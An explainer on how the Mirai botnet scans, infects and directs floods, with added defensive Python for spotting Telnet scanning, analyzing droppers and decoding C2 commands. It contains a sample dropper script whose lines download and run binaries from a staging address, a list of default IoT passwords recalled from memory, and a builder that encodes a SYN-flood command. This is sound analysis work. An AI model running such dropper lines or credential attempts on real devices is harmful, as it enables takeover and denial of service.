The Mirai botnet is actively exploiting known web vulnerabilities in attacks that have compromised over 1,200 sites across 780 customer accounts; researchers have identified over 200 malicious URLs and 230 distinct malware samples, including bash scripts and ELF binaries, delivered through these attacks.
The botnet leverages these compromised sites to launch further attacks, demonstrating its ongoing evolution and persistent threat to internet infrastructure.
Attackers exploit web vulnerabilities to execute a malicious bash script that downloads and installs the Mirai malware in two stages: the first-stage script fetches a second-stage ELF binary built for the target system's CPU architecture and runs it.
At the same time, the prospect of AI-assisted DDoS tooling adds to the risk: AI-generated polymorphic malware that changes its form to evade signature-based detection could infect systems at scale, amplifying the threat that Mirai-style botnets already pose.
Explore the Inner Workings of a Notorious Botnet
A DDoS botnet attack involves a central control server issuing attack commands to a network of compromised devices (the botnet), which then floods a target with malicious traffic, overwhelming its resources and causing a denial of service.
Botnets enhance DDoS attacks by obscuring the attacker’s identity, amplifying attack power, and distributing the attack across a vast, geographically dispersed network, making mitigation challenging.
Botnet operators have shifted from spam-based monetization to extortion and DDoS-for-hire services built on botnets like Mirai, which leverages the massive, weakly secured, and often neglected IoT device ecosystem.
These devices offer a large, homogeneous attack platform thanks to their sheer numbers, poor vendor security, consumer apathy, rapid market growth, and largely standardized (Linux-based) operating systems, making them highly attractive targets for botnet recruitment.
Mirai's scanning workflow aggressively seeks out vulnerable devices to recruit: each bot runs a SYN scan against random internet addresses (Mirai targets Telnet on ports 23 and 2323) to identify hosts with the port open.
It then attempts to log in using a small hard-coded list of default usernames and passwords, matching the Telnet prompts with simple pattern matching, and on a successful login the scanner reports the newly compromised device (address and working credentials) to a central command-and-control server, expanding the botnet's reach.
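The two halves of this scanning workflow leave distinctive traces: one source SYN-probing many hosts on the Telnet ports in a short window, followed by logins drawn from a fixed credential list. The following detection logic is an added example (not code from the page, Imperva, or the Mirai source) that runs over constructed firewall and Telnet authentication log lines in an invented format; the credential pairs are a small subset of the list in the leaked Mirai scanner as I recall it, and should be checked against your own copy.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample logs in an invented format (not real traffic): one source
# probing twelve hosts on Telnet within a few seconds, and one benign source
# making a handful of unrelated connections.
CONN_LOG = "\n".join(
    [f"2024-05-01T10:00:{i:02d}Z SYN src=198.51.100.7 dst=192.0.2.{i + 1} dport=23"
     for i in range(12)]
    + [
        "2024-05-01T10:00:05Z SYN src=192.0.2.50 dst=192.0.2.1 dport=23",
        "2024-05-01T10:00:06Z SYN src=192.0.2.50 dst=192.0.2.2 dport=443",
        "2024-05-01T10:00:07Z SYN src=192.0.2.50 dst=192.0.2.3 dport=443",
    ]
)

AUTH_LOG = """\
2024-05-01T10:00:20Z telnet-login src=198.51.100.7 user="root" pass="xc3511" result=fail
2024-05-01T10:00:21Z telnet-login src=198.51.100.7 user="root" pass="vizxv" result=fail
2024-05-01T10:00:22Z telnet-login src=198.51.100.7 user="admin" pass="admin" result=fail
2024-05-01T10:00:23Z telnet-login src=198.51.100.7 user="root" pass="7ujMko0vizxv" result=ok
2024-05-01T10:01:00Z telnet-login src=192.0.2.50 user="admin" pass="admin" result=fail
"""

# Subset of the hard-coded Telnet credential list from the leaked Mirai
# scanner, recalled from memory (assumption: verify against your copy).
MIRAI_DEFAULT_CREDS = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"), ("admin", "admin"),
    ("root", "888888"), ("root", "default"), ("root", "juantech"),
    ("support", "support"), ("root", "7ujMko0vizxv"), ("admin", "password"),
}

CONN_RE = re.compile(r"^(?P<ts>\S+) SYN src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)$")
AUTH_RE = re.compile(r'^(?P<ts>\S+) telnet-login src=(?P<src>\S+) '
                     r'user="(?P<user>[^"]*)" pass="(?P<pw>[^"]*)" result=(?P<result>\w+)$')
TELNET_PORTS = {"23", "2323"}


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def find_telnet_scanners(conn_log: str, min_targets: int = 10,
                         window: timedelta = timedelta(seconds=60)) -> dict:
    """Sources that SYN-probe >= min_targets distinct hosts on 23/2323 within `window`.

    Returns {source_ip: max distinct targets seen in any window}.
    """
    probes = defaultdict(list)
    for line in conn_log.splitlines():
        m = CONN_RE.match(line)
        if m and m["dport"] in TELNET_PORTS:
            probes[m["src"]].append((parse_ts(m["ts"]), m["dst"]))
    scanners = {}
    for src, events in probes.items():
        events.sort()
        best, lo = 0, 0
        for hi in range(len(events)):           # sliding time window
            while events[hi][0] - events[lo][0] > window:
                lo += 1
            best = max(best, len({dst for _, dst in events[lo:hi + 1]}))
        if best >= min_targets:
            scanners[src] = best
    return scanners


def find_default_cred_bruteforce(auth_log: str, min_attempts: int = 3) -> dict:
    """Sources that try >= min_attempts credentials from the Mirai list.

    A successful login with one of these pairs means the device is now a bot.
    """
    hits = defaultdict(lambda: {"attempts": 0, "matched": [], "success": False})
    for line in auth_log.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue
        cred = (m["user"], m["pw"])
        if cred in MIRAI_DEFAULT_CREDS:
            h = hits[m["src"]]
            h["attempts"] += 1
            h["matched"].append(cred)
            h["success"] = h["success"] or m["result"] == "ok"
    return {src: h for src, h in hits.items() if h["attempts"] >= min_attempts}


if __name__ == "__main__":
    print("telnet scanners:", find_telnet_scanners(CONN_LOG))
    print("default-cred brute force:", find_default_cred_bruteforce(AUTH_LOG))
```

The window threshold is deliberately low because a single Mirai bot probes at a high rate; tune `min_targets` to your network's baseline, and treat a `success=True` entry as a confirmed compromise rather than an attempt.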
The infection workflow begins with the identification of a vulnerable device and its working credentials. The loader then logs in, determines the device's CPU architecture, and deploys the matching architecture-specific malware binary onto it.
After the binary runs, the compromised device joins the botnet and actively participates in scanning and attack operations alongside the other nodes.
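Both the web-delivered bash dropper described earlier (a first stage that fetches a second-stage binary per architecture) and the loader step above produce the same artifact for an analyst: a script that tries to download and run one ELF per CPU architecture from a staging server. The analyzer below is an added example, not code from the page or from any real sample; the dropper text is constructed to match the pattern the text describes (203.0.113.5 is TEST-NET-3 documentation space), and the `uname -m` mapping is an assumption you should extend to the naming scheme of the samples you actually have.

```python
import re
from urllib.parse import urlparse

# Constructed first-stage script in the style the text describes; not a real
# sample. 203.0.113.5 is TEST-NET-3 documentation address space.
STAGE1 = """\
#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://203.0.113.5/bins/x.mips; chmod +x x.mips; ./x.mips; rm -rf x.mips
wget http://203.0.113.5/bins/x.mpsl; chmod +x x.mpsl; ./x.mpsl; rm -rf x.mpsl
wget http://203.0.113.5/bins/x.arm; chmod +x x.arm; ./x.arm; rm -rf x.arm
wget http://203.0.113.5/bins/x.arm7; chmod +x x.arm7; ./x.arm7; rm -rf x.arm7
wget http://203.0.113.5/bins/x.x86; chmod +x x.x86; ./x.x86; rm -rf x.x86
"""

# Binary-name suffixes commonly used for per-architecture builds.
ARCH_SUFFIXES = {"mips", "mpsl", "mipsel", "arm", "arm5", "arm6", "arm7",
                 "x86", "x86_64", "i586", "i686", "ppc", "m68k", "sh4", "sparc"}

# Assumed mapping from `uname -m` output to the suffix a loader would pick;
# extend it for the naming scheme of the samples you are analysing.
UNAME_TO_SUFFIX = {"mips": "mips", "mipsel": "mpsl", "armv5tel": "arm5",
                   "armv6l": "arm6", "armv7l": "arm7", "i686": "x86",
                   "x86_64": "x86_64", "ppc": "ppc", "sh4": "sh4"}

URL_RE = re.compile(r"(?:wget|curl)\b[^\n;|&]*?(https?://[^\s;|&'\"]+)")
WRITABLE_DIR_RE = re.compile(r"cd\s+(/tmp|/var/tmp|/var/run|/dev/shm|/mnt)\b")


def analyze_stage1(script: str) -> dict:
    """Pull second-stage URLs and staging indicators out of a dropper script."""
    urls = URL_RE.findall(script)
    arches = set()
    for u in urls:
        filename = urlparse(u).path.rsplit("/", 1)[-1]
        suffix = filename.rsplit(".", 1)[-1] if "." in filename else ""
        if suffix in ARCH_SUFFIXES:
            arches.add(suffix)
    indicators = {
        # one download per architecture, all attempted blindly
        "multi_arch_fetch": len(arches) >= 3,
        # downloaded file is made executable before it is run
        "chmod_exec": re.search(r"chmod\s+(\+x|[0-7]*7[0-7]*)\b", script) is not None,
        # staging in a world-writable directory present on minimal firmware
        "writable_staging_dir": WRITABLE_DIR_RE.search(script) is not None,
        # payload removed from disk after launch to hinder forensics
        "self_delete": re.search(r"\brm\s+-rf?\s+\S+", script) is not None,
    }
    return {
        "urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "arches": arches,
        "indicators": indicators,
        "score": sum(indicators.values()),
    }


def likely_executed(arches: set, uname_m: str):
    """Which of the staged binaries would actually run on a host of this architecture.

    The others fail at exec time, which is why IR usually finds that only one
    of the N downloads ever ran even though the script fetched all of them.
    """
    suffix = UNAME_TO_SUFFIX.get(uname_m)
    return suffix if suffix in arches else None


if __name__ == "__main__":
    report = analyze_stage1(STAGE1)
    print(report)
    print("on an armv7l host, executed:", likely_executed(report["arches"], "armv7l"))
```

The extracted hosts are the staging servers to block and to pull the second-stage binaries from for analysis; `likely_executed` narrows N samples down to the one that actually ran on a given device once you know its architecture.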
According to Imperva, the attack workflow begins with the botmaster sending an attack command to the control server, which then disseminates specific attack instructions to each node.
Upon receiving these directives, the nodes flood the target with packets at their maximum rate while continuing their background scanning, so the botnet keeps discovering and infecting new hosts even during an attack.
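What those "specific attack instructions" look like on the wire matters to anyone decoding captured C2 traffic. The decoder below is an added example, not code from the page, Imperva, or the Mirai project; it models the C2-to-bot framing and attack-command layout of the leaked Mirai source as I recall it (a uint16 length prefix where zero is a keepalive, then duration, vector, a target list and an option list), and the sample stream is constructed with TEST-NET addresses. The vector-ID names and the layout should be verified against the copy of the source you are working from.

```python
import struct
from dataclasses import dataclass
from ipaddress import IPv4Address

# Attack vector IDs as I recall them from attack.h in the leaked Mirai source
# (assumption: check against the copy you are working from).
ATTACK_VECTORS = {0: "UDP", 1: "VSE", 2: "DNS", 3: "SYN", 4: "ACK", 5: "STOMP",
                  6: "GRE_IP", 7: "GRE_ETH", 9: "UDP_PLAIN", 10: "HTTP"}


@dataclass
class AttackCommand:
    duration: int      # seconds, uint32 big-endian
    vector: int        # attack type id, uint8
    targets: list      # [(dotted_ip, prefix_len), ...]
    options: dict      # option key (uint8) -> raw value bytes (opaque here)

    @property
    def vector_name(self) -> str:
        return ATTACK_VECTORS.get(self.vector, f"unknown({self.vector})")


def parse_attack_command(body: bytes) -> AttackCommand:
    """Decode one command body: duration, vector, target list, option list."""
    off = 0

    def take(n: int) -> bytes:
        nonlocal off
        if off + n > len(body):
            raise ValueError(f"truncated command at offset {off}")
        chunk = body[off:off + n]
        off += n
        return chunk

    (duration,) = struct.unpack("!I", take(4))
    vector = take(1)[0]
    targets = []
    for _ in range(take(1)[0]):                 # uint8 target count
        addr = IPv4Address(take(4))             # ipv4_t in network order
        targets.append((str(addr), take(1)[0])) # uint8 netmask / prefix length
    options = {}
    for _ in range(take(1)[0]):                 # uint8 option count
        key = take(1)[0]
        options[key] = take(take(1)[0])         # uint8 length, then value bytes
    if off != len(body):
        raise ValueError(f"{len(body) - off} trailing bytes")
    return AttackCommand(duration, vector, targets, options)


def split_c2_stream(data: bytes) -> list:
    """Frame a captured C2->bot stream: uint16 length prefix, 0 = keepalive."""
    msgs, off = [], 0
    while off + 2 <= len(data):
        (length,) = struct.unpack("!H", data[off:off + 2])
        off += 2
        if length == 0:
            msgs.append(None)                   # keepalive, nothing to decode
            continue
        if off + length > len(data):
            raise ValueError("stream ends mid-command")
        msgs.append(parse_attack_command(data[off:off + length]))
        off += length
    return msgs


def build_attack_command(duration, vector, targets, options) -> bytes:
    """Inverse of parse_attack_command; used here only to construct a sample."""
    body = struct.pack("!IBB", duration, vector, len(targets))
    for ip, prefix in targets:
        body += IPv4Address(ip).packed + struct.pack("!B", prefix)
    body += struct.pack("!B", len(options))
    for key, value in options.items():
        body += struct.pack("!BB", key, len(value)) + value
    return struct.pack("!H", len(body)) + body


# Constructed sample: a keepalive, then a 60-second SYN flood against a /32 and
# a /24 (TEST-NET addresses) with two options whose keys and values are made up.
SAMPLE_STREAM = (
    struct.pack("!H", 0)
    + build_attack_command(60, 3, [("203.0.113.10", 32), ("198.51.100.0", 24)],
                           {7: b"80", 6: b"0"})
)

if __name__ == "__main__":
    for msg in split_c2_stream(SAMPLE_STREAM):
        print("keepalive" if msg is None else
              f"{msg.vector_name} for {msg.duration}s -> {msg.targets} opts={msg.options}")
```

Decoding a stream this way turns a raw capture into the target list and duration the operator actually ordered, which is what you want to hand to the network team for upstream filtering; the parser fails loudly on truncated or over-long bodies rather than guessing.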